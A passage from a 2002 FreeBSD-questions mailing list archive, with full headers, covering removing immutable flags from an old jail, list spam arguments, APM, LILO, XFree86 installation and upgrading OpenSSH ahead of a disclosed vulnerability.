25 14:39:41 2002 Delivered-To: freebsd-questions@freebsd.org Received: from mail.cics.co.za (mail.cics.co.za [196.15.196.10]) by hub.freebsd.org (Postfix) with ESMTP id 6C4B937B400 for ; Tue, 25 Jun 2002 14:39:27 -0700 (PDT) Received: (qmail 5955 invoked by uid 85); 25 Jun 2002 21:42:51 -0000 Received: from unknown (HELO mark.igate.org.za) (196.15.196.5) by mail.cics.co.za with SMTP; 25 Jun 2002 21:42:49 -0000 Date: Tue, 25 Jun 2002 23:39:06 +0200 From: Mark Pearce To: Matthew Seaman Cc: freebsd-questions@FreeBSD.ORG Subject: Re: How do I delete files used in a jail Message-Id: <20020625233906.200f88e8.mark@netchat.co.za> In-Reply-To: <20020625173944.GB15530@happy-idiot-talk.infracaninophi> References: <20020625180143.768902ff.mark@netchat.co.za> <20020625173944.GB15530@happy-idiot-talk.infracaninophi> Organization: Netchat X-Mailer: Sylpheed version 0.7.6claws (GTK+ 1.2.10; i386-portbld-freebsd4.6) Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit X-Virus-Scanned: by AMaViS perl-11 Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG > > > I am trying to delete some directories that I was using within a > > jail a while back. I try deleting and this is the errors I get: > > > > Any ideas why ? > > Perhaps the files have had the immutable flag set. Try: > > ls -loR jail > > to see what flags are set. > > chflags -R 0 jail > > should recursively remove all flag settings --- if you're running with > securelevel >0, then you'll have to reboot to single user mode to get > that to work. You chould then be able to rm -rf. This worked like a charm, Thanks Mark To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Tue Jun 25 14:46:45 2002 Delivered-To: freebsd-questions@freebsd.org Received: from yeoman.sinbad.net (yeoman.sinbad.net [12.17.176.5]) by hub.freebsd.org (Postfix) with ESMTP id 04D7F37B405 for ; Tue, 25 Jun 2002 14:45:58 -0700 (PDT) Received: from there (95-7-237-24-cable.anchorageak.net [24.237.7.95]) by yeoman.sinbad.net (Postfix) with SMTP id 6B6B920E05; Tue, 25 Jun 2002 13:45:51 -0800 (AKDT) Content-Type: text/plain; charset="iso-8859-1" From: Beech Rintoul Reply-To: akbeech@sinbad.net To: David Kramer , freebsd-questions@FreeBSD.ORG Subject: Re: I hate to bring it up again (spamming) Date: Tue, 25 Jun 2002 13:45:50 -0800 X-Mailer: KMail [version 1.3] References: In-Reply-To: Organization: Sinbad Network Communications MIME-Version: 1.0 Content-Transfer-Encoding: 8bit Message-Id: <20020625214551.6B6B920E05@yeoman.sinbad.net> Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG On Tuesday 25 June 2002 01:09 pm, David Kramer wrote: > On Tue, 25 Jun 2002, ro0t wrote: > > Well like i said, i thought at first it was someone being a real idiot. > > Which i have no sympathy for. Then the last guy who emailed us > > enlightened me and made me think further of how he could be the victim > > also. It makes much sense. Im not attacking anyone. I just was upset > > because everything that is a good thing nowadays seems to get ruined by a > > ten year old with too much time on his hands. Anyhow im done discussing > > this its bull*hit. Anybody need help on _FreeBSD_ =] And i apologize for > > jumping the gun, without fully thinking out the situation. > > A coupla things. > > -You posted easily six or so messages today complaining about the guy. > How is that helping your fellow FreeBSD user? > > -It looks to me like you are taking messages that people have sent you in > private (based on the header and the lack of the original post showing up > on the list) and responding on the list, complete with the private mail > contents. This is a blatant netiquette violation. If someone sent you > something in private, it should stay that way. > > -"Never attribute to malice that which can more easily be attributed to > incompetence" (unknown). Edwin Renders is clearly a newbie at best, and a > luser at worst. Either way, he probably doesn't check his mail more than > a few times a week. He could be sipping pina coladas by the poolside > ignorant that all this is happening because he's got cablemodem or DSL > access, and his machine is always connected whether he's there or not. > > -Even if he was doing it on purpose, responding to someone like that just > makes them do it more. > > As a side comment, even without Edwin, I've never been on a technical list > that got so much spam. > > ------------------------------------------------------------------- > DDDD David Kramer http://thekramers.net Well luser, newbie or just plain stupid, why don't the admins here block his IP till he gets a clue? Just my .02 Beech -- ------------------------------------------------------------------- Beech Rintoul - SysAdmin - akbeech@sinbad.net /"\ ASCII Ribbon Campaign | Sinbad Network Communications \ / - NO HTML/RTF in e-mail | 3101 Penland Parkway #K-38 X - NO Word docs in e-mail | Anchorage, AK 99508-1957 / \ ----------------------------------------------------------------- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Tue Jun 25 14:50:39 2002 Delivered-To: freebsd-questions@freebsd.org Received: from smtp-send.myrealbox.com (smtp-send.myrealbox.com [192.108.102.143]) by hub.freebsd.org (Postfix) with ESMTP id 3F59737B400 for ; Tue, 25 Jun 2002 14:50:35 -0700 (PDT) Received: from jogega jogegabsd@smtp-send.myrealbox.com [216.230.149.129] by smtp-send.myrealbox.com with NetMail SMTP Agent $Revision: 3.9 $ on Novell NetWare; Tue, 25 Jun 2002 15:50:33 -0600 From: "jogegabsd" To: "Matt Snow" , "Guillaume" Cc: , "Jack L. Stone" , "jogegabsd" , Subject: RE: APM not even a sign Date: Tue, 25 Jun 2002 15:50:22 -0600 Message-ID: MIME-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: 7bit X-Priority: 3 (Normal) X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook IMO, Build 9.0.2416 (9.0.2910.0) In-Reply-To: <20020621211925.D61146-100000@seven.slakin.net> Importance: Normal X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000 Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG > -----Original Message----- > I went through hell with this and found the solution on accident. > > make sure you have the following: > > in KERNEL: > device apm0 at nexus? > device dc0 > > in your /etc/rc.conf: > apm_enable="YES" > apmd_enable="YES" > > recompile your kernel and install it and you should be good to go. > I hope this works for you, it worked with 4.5 on my vaio. > Sorry or the late reply. I try this with no success the same result. I really don't know what's going on. Thanks anyway Gerardo Amaya To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Tue Jun 25 14:51:11 2002 Delivered-To: freebsd-questions@freebsd.org Received: from CPE0004761ac738-CM00109515bc65.cpe.net.cable.rogers.com (CPE0004761ac738-CM00109515bc65.cpe.net.cable.rogers.com [24.103.39.131]) by hub.freebsd.org (Postfix) with SMTP id BBF2137B400 for ; Tue, 25 Jun 2002 14:50:43 -0700 (PDT) Received: (qmail 84091 invoked from network); 25 Jun 2002 21:51:03 -0000 Received: from unknown (HELO vsivyoung) (66.46.21.253) by cpe0004761ac738-cm00109515bc65.cpe.net.cable.rogers.com with SMTP; 25 Jun 2002 21:51:03 -0000 Message-ID: <020c01c21c92$91804220$c801a8c0@vsivyoung> From: "Miroslav Pendev" To: "ro0t" Cc: "freebsd-questions" References: Subject: Re: Should I expect this? Date: Tue, 25 Jun 2002 17:52:13 -0400 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 6.00.2600.0000 X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000 Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG > > Hello, list: > > > > Are these viruses just something I should expect from time to time? Of > > course, here at work, we have WinProxy, which, incidentally does a > > great job of detected and eliminating viruses before they get in, so it > > doen't really matter to me, but isn't there something that can be done > > before these posts make it out? > > > > > > Best Regards, > > > > Joshua Lokken > > OMIC Portland Branch > > > > > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > > with "unsubscribe freebsd-questions" in the body of the message > > > > > > I have contacted him about it. I am waiting for a reply. As far as > stopping > > spam and viruses this isnt my list. Youll have to ask whoever runs this > list > > to do a better job of doing that. *cough > > > > How about some mail rules into your favorite e-mail client > (Microsoft Outlook IMO, Build 9.0.2416 (9.0.2910.0)) > for 'moving' these into the right direction (folder)? > > Or how about some mail filtering or virus checking on your mail server? > I just did it and it works perfect! No viruses... just your questions... ;-> > > If you are good enough to use FreeBSD, I think, you must know at lest > 3 more ways to stop these for yourself. > > ""About 'this isnt my list': Welcome to the real world!"" > > ^ whats that supposed to mean? That is the way the things are. In the big mailists there is allways spam and viruses. Not because of you, not because the mai admin is not doing better job... just because this is the best way to send a message to a lot of people without the need to make your own mail server! > And you can look into headers and paste my version of outlook? Are you > trying to state a point in this email? Nope! Righ now I am using Microsoft Outlook Express, too. Just put some mail rules 'bout these emails and that's all... it is not a big deal. --Miro To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Tue Jun 25 14:51:39 2002 Delivered-To: freebsd-questions@freebsd.org Received: from labs.unixhideout.com (dsl-65-187-193-189.telocity.com [65.187.193.189]) by hub.freebsd.org (Postfix) with ESMTP id 96C7137B401 for ; Tue, 25 Jun 2002 14:50:44 -0700 (PDT) Received: from UNIXHIDEOUT ([192.168.1.10]) by labs.unixhideout.com (8.12.4/8.12.3) with SMTP id g5PLoiFv093523 for ; Tue, 25 Jun 2002 17:50:45 -0400 (EDT) (envelope-from root@unixhideout.com) From: "ro0t" To: Subject: RE: I hate to bring it up again (spamming) Date: Tue, 25 Jun 2002 17:50:41 -0400 Message-ID: MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 (Normal) X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook IMO, Build 9.0.2416 (9.0.2910.0) In-Reply-To: <20020625214551.6B6B920E05@yeoman.sinbad.net> X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000 Importance: Normal Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG -----Original Message----- From: owner-freebsd-questions@FreeBSD.ORG [mailto:owner-freebsd-questions@FreeBSD.ORG]On Behalf Of Beech Rintoul Sent: Tuesday, June 25, 2002 5:46 PM To: David Kramer; freebsd-questions@FreeBSD.ORG Subject: Re: I hate to bring it up again (spamming) On Tuesday 25 June 2002 01:09 pm, David Kramer wrote: > On Tue, 25 Jun 2002, ro0t wrote: > > Well like i said, i thought at first it was someone being a real idiot. > > Which i have no sympathy for. Then the last guy who emailed us > > enlightened me and made me think further of how he could be the victim > > also. It makes much sense. Im not attacking anyone. I just was upset > > because everything that is a good thing nowadays seems to get ruined by a > > ten year old with too much time on his hands. Anyhow im done discussing > > this its bull*hit. Anybody need help on _FreeBSD_ =] And i apologize for > > jumping the gun, without fully thinking out the situation. > > A coupla things. > > -You posted easily six or so messages today complaining about the guy. > How is that helping your fellow FreeBSD user? > > -It looks to me like you are taking messages that people have sent you in > private (based on the header and the lack of the original post showing up > on the list) and responding on the list, complete with the private mail > contents. This is a blatant netiquette violation. If someone sent you > something in private, it should stay that way. > > -"Never attribute to malice that which can more easily be attributed to > incompetence" (unknown). Edwin Renders is clearly a newbie at best, and a > luser at worst. Either way, he probably doesn't check his mail more than > a few times a week. He could be sipping pina coladas by the poolside > ignorant that all this is happening because he's got cablemodem or DSL > access, and his machine is always connected whether he's there or not. > > -Even if he was doing it on purpose, responding to someone like that just > makes them do it more. > > As a side comment, even without Edwin, I've never been on a technical list > that got so much spam. > > ------------------------------------------------------------------- > DDDD David Kramer http://thekramers.net Well luser, newbie or just plain stupid, why don't the admins here block his IP till he gets a clue? Just my .02 Beech -- ------------------------------------------------------------------- Beech Rintoul - SysAdmin - akbeech@sinbad.net /"\ ASCII Ribbon Campaign | Sinbad Network Communications \ / - NO HTML/RTF in e-mail | 3101 Penland Parkway #K-38 X - NO Word docs in e-mail | Anchorage, AK 99508-1957 / \ ----------------------------------------------------------------- Finally someones who's head if i shook i woouldnt hear a marble in a coffee cup. This lame discussion would have been overwith two hours ago if people would find a solution to the problem in the first place rather then flame the innocent victims. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Tue Jun 25 14:57:21 2002 Delivered-To: freebsd-questions@freebsd.org Received: from mail.ettnet.se (mail.ettnet.se [212.109.4.7]) by hub.freebsd.org (Postfix) with SMTP id CD57537B404 for ; Tue, 25 Jun 2002 14:57:00 -0700 (PDT) Received: (qmail 90907 invoked by uid 0); 25 Jun 2002 21:56:58 -0000 Received: from unknown (HELO chappe2) (212.109.5.4) by mail.ettnet.se with SMTP; 25 Jun 2002 21:56:58 -0000 Message-ID: <002501c21c93$3abfe520$04056dd4@chappe2> From: "Thomas Widlundh" To: "freeBSD" Subject: Lilo question Date: Tue, 25 Jun 2002 23:56:18 +0200 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 6.00.2600.0000 X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000 Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG Hi, On my machine I have freeBSD on the first HDD and Slackware on the second. Can I somehow make the BSD Lilo to start the Slackware on disk 2 (/dec/hdb)? Should I let Slackware install its own lilo? Ideas? Thanks, Thomas To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Tue Jun 25 15: 1:30 2002 Delivered-To: freebsd-questions@freebsd.org Received: from CPE0004761ac738-CM00109515bc65.cpe.net.cable.rogers.com (CPE0004761ac738-CM00109515bc65.cpe.net.cable.rogers.com [24.103.39.131]) by hub.freebsd.org (Postfix) with SMTP id 26F0537B401 for ; Tue, 25 Jun 2002 15:00:32 -0700 (PDT) Received: (qmail 84634 invoked from network); 25 Jun 2002 22:00:51 -0000 Received: from unknown (HELO vsivyoung) (66.46.21.253) by cpe0004761ac738-cm00109515bc65.cpe.net.cable.rogers.com with SMTP; 25 Jun 2002 22:00:51 -0000 Message-ID: <021901c21c93$f03af0c0$c801a8c0@vsivyoung> From: "Miroslav Pendev" To: "ro0t" Cc: "freebsd-questions" References: Subject: Re: Should I expect this? Date: Tue, 25 Jun 2002 18:02:02 -0400 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 6.00.2600.0000 X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000 Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG > > -----Original Message----- > From: Miroslav Pendev > [mailto:shadow@CPE0004761ac738-CM00109515bc65.cpe.net.cable.rogers.com] > Sent: Tuesday, June 25, 2002 5:52 PM > To: ro0t > Cc: freebsd-questions > Subject: Re: Should I expect this? > > > > > Hello, list: > > > > > > Are these viruses just something I should expect from time to time? Of > > > course, here at work, we have WinProxy, which, incidentally does a > > > great job of detected and eliminating viruses before they get in, so it > > > doen't really matter to me, but isn't there something that can be done > > > before these posts make it out? > > > > > > > > > Best Regards, > > > > > > Joshua Lokken > > > OMIC Portland Branch > > > > > > > > > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > > > with "unsubscribe freebsd-questions" in the body of the message > > > > > > > > > I have contacted him about it. I am waiting for a reply. As far as > > stopping > > > spam and viruses this isnt my list. Youll have to ask whoever runs this > > list > > > to do a better job of doing that. *cough > > > > > > > How about some mail rules into your favorite e-mail client > > (Microsoft Outlook IMO, Build 9.0.2416 (9.0.2910.0)) > > for 'moving' these into the right direction (folder)? > > > > Or how about some mail filtering or virus checking on your mail server? > > I just did it and it works perfect! No viruses... just your questions... > ;-> > > > > If you are good enough to use FreeBSD, I think, you must know at lest > > 3 more ways to stop these for yourself. > > > > ""About 'this isnt my list': Welcome to the real world!"" > > > > ^ whats that supposed to mean? > > That is the way the things are. In the big mailists there is > allways spam and viruses. Not because of you, not because the > mai admin is not doing better job... just because this is the > best way to send a message to a lot of people without the need to > make your own mail server! > > > And you can look into headers and paste my version of outlook? Are you > > trying to state a point in this email? > > Nope! Righ now I am using Microsoft Outlook Express, too. > Just put some mail rules 'bout these emails and that's all... > it is not a big deal. > > --Miro > > hehe i didnt even know it had that feature. thanks man. I thought you were > flaming microsoft like these other guys. It seems if you own a windows box > and freebsd your not good enough. well maybe if they would make freebsd a > half decent desktop id be ok. > I am using MS OE at my work. I am stuck with some M$ crap and I need this cool gaming OS ;-) Otherwise, at home I have FreeBSD 4.6 mail server with virus check of the incomming e-maisl and there is not even one virus e-mail! I am using Mutt as mail client! 'All e-mail clients suck, Mutt just sucks less than others...' --Miro To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Tue Jun 25 15:15:37 2002 Delivered-To: freebsd-questions@freebsd.org Received: from hotmail.com (oe15.law11.hotmail.com [64.4.16.119]) by hub.freebsd.org (Postfix) with ESMTP id 463DB37B404 for ; Tue, 25 Jun 2002 15:15:31 -0700 (PDT) Received: from mail pickup service by hotmail.com with Microsoft SMTPSVC; Tue, 25 Jun 2002 15:15:31 -0700 X-Originating-IP: [24.71.22.183] From: "Victor Wang" To: Subject: Problems installing XFree86 Date: Tue, 25 Jun 2002 15:11:20 -0700 MIME-Version: 1.0 X-Mailer: MSN Explorer 7.00.0021.1900 Content-Type: multipart/alternative; boundary="----=_NextPart_001_0000_01C21C5A.8FC85360" Message-ID: X-OriginalArrivalTime: 25 Jun 2002 22:15:31.0173 (UTC) FILETIME=[D1956950:01C21C95] Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG ------=_NextPart_001_0000_01C21C5A.8FC85360 Content-Type: text/plain; charset="big5" Content-Transfer-Encoding: quoted-printable When I try to install XFree86 with sysinstall, using DOS, it can find the= INDEX and everything, but it can't find freetype2-2.0.9 and thus can't l= oad XFree86-libraries-4.2.0_1 and XFree86-FontServer-4.2.0 either. I chec= ked, and freetype2-2.0.9 wasn't even on the FreeBSD ftp site, so I went e= lsewhere and found it and copied it into the x11-servers, x11, and x11-fo= nts folders just to make sure. Still, sysinstall couldn't find it. Coul= d somebody please tell me how to get X installed?! I am installing everything on my laptop by downloading the required files= to the DOS partition under C:/FreeBSD/.../... and then booting up FreeBS= D on teh second partition and running sysinstall. What files do you actu= ally need to run XFree86? I just downloaded everything in the x11 directo= ry and everything starting with "XFree86" in x11-servers and x11-fonts. Also, why do people always put a number in brackets after every command? = For example, ls(1). BTW, yes, I am a newbie. Thanks in advance. :)Get more from the Web. FREE MSN Explorer download := http://explorer.msn.com ------=_NextPart_001_0000_01C21C5A.8FC85360 Content-Type: text/html; charset="big5" Content-Transfer-Encoding: quoted-printable
When I try to = install XFree86 with sysinstall, using DOS, it can find the INDEX and eve= rything, but it can't find freetype2-2.0.9 and thus can't load XFree86-li= braries-4.2.0_1 and XFree86-FontServer-4.2.0 either. I checked, and freet= ype2-2.0.9 wasn't even on the FreeBSD ftp site, so I went elsewhere and f= ound it and copied it into the x11-servers, x11, and x11-fonts folders ju= st to make sure.  Still, sysinstall couldn't find it.  Could so= mebody please tell me how to get X installed?!
I am installing= everything on my laptop by downloading the required files to the DOS par= tition under C:/FreeBSD/.../... and then booting up FreeBSD on teh second= partition and running sysinstall.  What files do you actually = need to run XFree86? I just downloaded everything in the x11 directory&nb= sp;and everything starting with "XFree86" in x11-servers and x11-fon= ts.
Also, why do people always put a number in brackets after = every command?  For example, ls(1).  BTW, yes, I am a newbie.
Thanks in advance. :)



Get more from the Web. FREE MSN Explorer download : http://explorer.msn.com

------=_NextPart_001_0000_01C21C5A.8FC85360-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Tue Jun 25 15:25:52 2002 Delivered-To: freebsd-questions@freebsd.org Received: from ns1.fayre.dhs.org (adsl-66-126-160-122.dsl.snfc21.pacbell.net [66.126.160.122]) by hub.freebsd.org (Postfix) with ESMTP id 31AB837B401 for ; Tue, 25 Jun 2002 15:25:51 -0700 (PDT) Received: from localhost (jfayre@localhost) by ns1.fayre.dhs.org (8.11.6/8.11.6) with ESMTP id g5PNRKt17806 for ; Tue, 25 Jun 2002 16:27:21 -0700 Date: Tue, 25 Jun 2002 16:27:20 -0700 (PDT) From: Jason Fayre To: freebsd-questions@freebsd.org Subject: freebsd on cobalt raq3 Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG Hello, Has anyone ever tried to get FreeBSD running on a Cobalt RaQ3 1U box? If so, is there a how-to somewhere? These are x86 based boxes. I know that NetBSD has a port for the MIPS cobalt boxes. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Tue Jun 25 15:26:19 2002 Delivered-To: freebsd-questions@freebsd.org Received: from mta06-svc.ntlworld.com (mta06-svc.ntlworld.com [62.253.162.46]) by hub.freebsd.org (Postfix) with ESMTP id B506937B404 for ; Tue, 25 Jun 2002 15:26:10 -0700 (PDT) Received: from lungfish.ntlworld.com ([80.4.0.215]) by mta06-svc.ntlworld.com (InterMail vM.4.01.03.27 201-229-121-127-20010626) with ESMTP id <20020625222609.FRJI4119.mta06-svc.ntlworld.com@lungfish.ntlworld.com>; Tue, 25 Jun 2002 23:26:09 +0100 Received: from tuatara.goatsucker.org (tuatara.goatsucker.org [192.168.1.6]) by lungfish.ntlworld.com (8.11.6/8.11.6) with ESMTP id g5PMQ8V01134; Tue, 25 Jun 2002 23:26:08 +0100 (BST) (envelope-from scott@tuatara.goatsucker.org) Received: (from scott@localhost) by tuatara.goatsucker.org (8.12.3/8.12.3/Submit) id g5PMQ6Ox005082; Tue, 25 Jun 2002 23:26:06 +0100 (BST) (envelope-from scott) Date: Tue, 25 Jun 2002 23:26:06 +0100 From: Scott Mitchell To: Matthew Seaman Cc: Christopher Schulte , Lord Raiden , Marco Radzinschi , FreeBDS-Questions Subject: Re: Upcoming OpenSSH vulnerability (fwd) Message-ID: <20020625232606.C381@fishballoon.dyndns.org> References: <5.1.1.6.2.20020624224948.02923518@pop3s.schulte.org> <20020624234646.G22328-100000@mail.radzinschi.com> <4.2.0.58.20020625134233.009992b0@pop.netzero.net> <5.1.1.6.2.20020625124040.041c50f0@pop3s.schulte.org> <20020625205840.B381@fishballoon.dyndns.org> <20020625205928.GA50230@happy-idiot-talk.infracaninophi> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <20020625205928.GA50230@happy-idiot-talk.infracaninophi>; from m.seaman@infracaninophile.co.uk on Tue, Jun 25, 2002 at 09:59:28PM +0100 X-Operating-System: FreeBSD 4.6-STABLE i386 Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG On Tue, Jun 25, 2002 at 09:59:28PM +0100, Matthew Seaman wrote: > On Tue, Jun 25, 2002 at 08:58:40PM +0100, Scott Mitchell wrote: > > > With previous ssh vulnerabilities I've been able to just patch the base > > system, by rebuilding the world or using the patch included with the > > advisory. However, to get to 3.3 it looks like I'd need to install a port. > > > There are two OpenSSH ports: security/openssh and security/openssh-portable > > > What's the difference between these two ports? > > security/openssh is the straight OpenBSD code, also used in NetBSD. > security/openssh-portable is the modified portable version everyone > else uses. The main difference is that openssh-portable includes pam > support. > > > Which one should I install to deal with this vulnerability? > > Either will do: however the plan is that OpenSSH as supplied in the > base system will be upgraded to OpenSSH portable in the very near > future. As there shouldn't be too many FreeBSD specific modifications > to the portable code, it's likely that we'll be tracking new releases > of OpenSSH rather more closely than has been the case up to now. > > I'd install openssh-portable 3.3p1 now, before the full disclosure of > the vulnerability on (I think) Thursday, which should tide you over > until the base system gets 3.4p1 with the full patch. You need to > install 3.3p1 from a ports tree cvsup'd sometime after last night to > get the separation of privilege thing, which will provide almost > complete protection from the security hole. Thanks Matthew, a most helpful answer. I saw all the src/crypto/openssh-portable come across in the cvsup I just ran... hopefully that will come into -STABLE before too long as well. I see the openssh-portable port Makefile has a OPENSSH_OVERWRITE_BASE option. Presumably I can set that and NO_OPENSSH in make.conf to have the port replace the base ssh temporarily -- fewer things to undo when 3.4p1 hits the base system. Any non-obvious disadvantages to that approach that I'm not seeing? Thanks again, Scott -- =========================================================================== Scott Mitchell | PGP Key ID | "Eagles may soar, but weasels Cambridge, England | 0x54B171B9 | don't get sucked into jet engines" scott.mitchell@mail.com | 0xAA775B8B | -- Anon To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Tue Jun 25 15:39:56 2002 Delivered-To: freebsd-questions@freebsd.org Received: from mail.gbronline.com (mail.gbronline.com [12.145.226.4]) by hub.freebsd.org (Postfix) with ESMTP id ACB4D37B400 for ; Tue, 25 Jun 2002 15:39:50 -0700 (PDT) Received: from daleco [12.145.236.48] by mail.gbronline.com (SMTPD32-7.10) id A0DD35E0004C; Tue, 25 Jun 2002 17:38:21 -0500 Message-ID: <027b01c21c99$2812f420$30ec910c@fbccarthage.com> From: "Kevin Kinsey, DaleCo, S.P." To: "Victor Wang" Cc: References: Subject: Re: Problems installing XFree86 Date: Tue, 25 Jun 2002 17:39:23 -0500 MIME-Version: 1.0 Content-Type: text/plain; charset="big5" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 6.00.2600.0000 X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000 Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG Well, BTW, that last comment is obvious, and that's OK with me, but don't be surprised when you get treated like one, and that means rather roughly by some folks. Please hit your 'return' key after every 70-80 characters so that the lines are not so long. There is a pretty good explanation of why at Greg Lehey's site www.lemis.com. Look for a file called email.html (perhaps, haven't been there in a while.) Second, you sent HTML enabled email. This also causes grief to a lot of UNIXers. Mark questions@freebsd.org as "plain text only" in your Windows Address Book and people will treat you much nicer, generally speaking... (hopefully?) Third, and finally a real answer ;-) read the handbook (www.freebsd.org/handbook/) and you'll find that the number in ( ) after "every command" is to indicate whether they are referring to a shell command, system call, environment variable, name of a program, or whatever. There are 8 categories, but I've never gone to the trouble to memorize them. As I said, check the handbook. Finally, the X Window System. This is quite complicated --- if you're really a newbie I'd just get the system going with a good shell first. After that, I'd try to 'make' in the proper subdirectory in /usr/ports (you did install the "Ports Collection" when you were using /stand/sysinstall, didn't you?) You definitely need to read the handbook on this one. You can even fetch a copy to read from within windows --- it's in a lot of formats---the .rtf one is pretty in Word or Wordpad or whatever. FTP to ftp.freebsd.org and look in the 'pub/Freebsd/ doc' directory. The X Window System has a chapter around #9-10 or so. To sum up, here's your newbie lessons (and I've tried to be NICE ;-) 1. Wrap your lines! 2. Email in plain text to the lists! 3. Read the Handbook!, and 4. Read the Handbook some more. Best of luck with FBSD, and don't let us turn you off.... KDK ----- Original Message ----- From: Victor Wang To: freebsd-questions@FreeBSD.ORG Sent: Tuesday, June 25, 2002 5:11 PM Subject: Problems installing XFree86 When I try to install XFree86 with sysinstall, using DOS, it can find the INDEX and everything, but it can't find freetype2-2.0.9 and thus can't load XFree86-libraries-4.2.0_1 and XFree86-FontServer-4.2.0 either. I checked, and freetype2-2.0.9 wasn't even on the FreeBSD ftp site, so I went elsewhere and found it and copied it into the x11-servers, x11, and x11-fonts folders just to make sure. Still, sysinstall couldn't find it. Could somebody please tell me how to get X installed?! I am installing everything on my laptop by downloading the required files to the DOS partition under C:/FreeBSD/.../... and then booting up FreeBSD on teh second partition and running sysinstall. What files do you actually need to run XFree86? I just downloaded everything in the x11 directory and everything starting with "XFree86" in x11-servers and x11-fonts. Also, why do people always put a number in brackets after every command? For example, ls(1). BTW, yes, I am a newbie. Thanks in advance. :) To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Tue Jun 25 15:54:23 2002 Delivered-To: freebsd-questions@freebsd.org Received: from fed1mtao01.cox.net (fed1mtao01.cox.net [68.6.19.244]) by hub.freebsd.org (Postfix) with ESMTP id 7735437B401 for ; Tue, 25 Jun 2002 15:54:13 -0700 (PDT) Received: from ip24_56_31_67.ph.cox.net ([24.56.31.67]) by fed1mtao01.cox.net (InterMail vM.5.01.04.05 201-253-122-122-105-20011231) with ESMTP id <20020625225411.PHVE25007.fed1mtao01.cox.net@ip24_56_31_67.ph.cox.net> for ; Tue, 25 Jun 2002 18:54:11 -0400 Content-Type: text/plain; 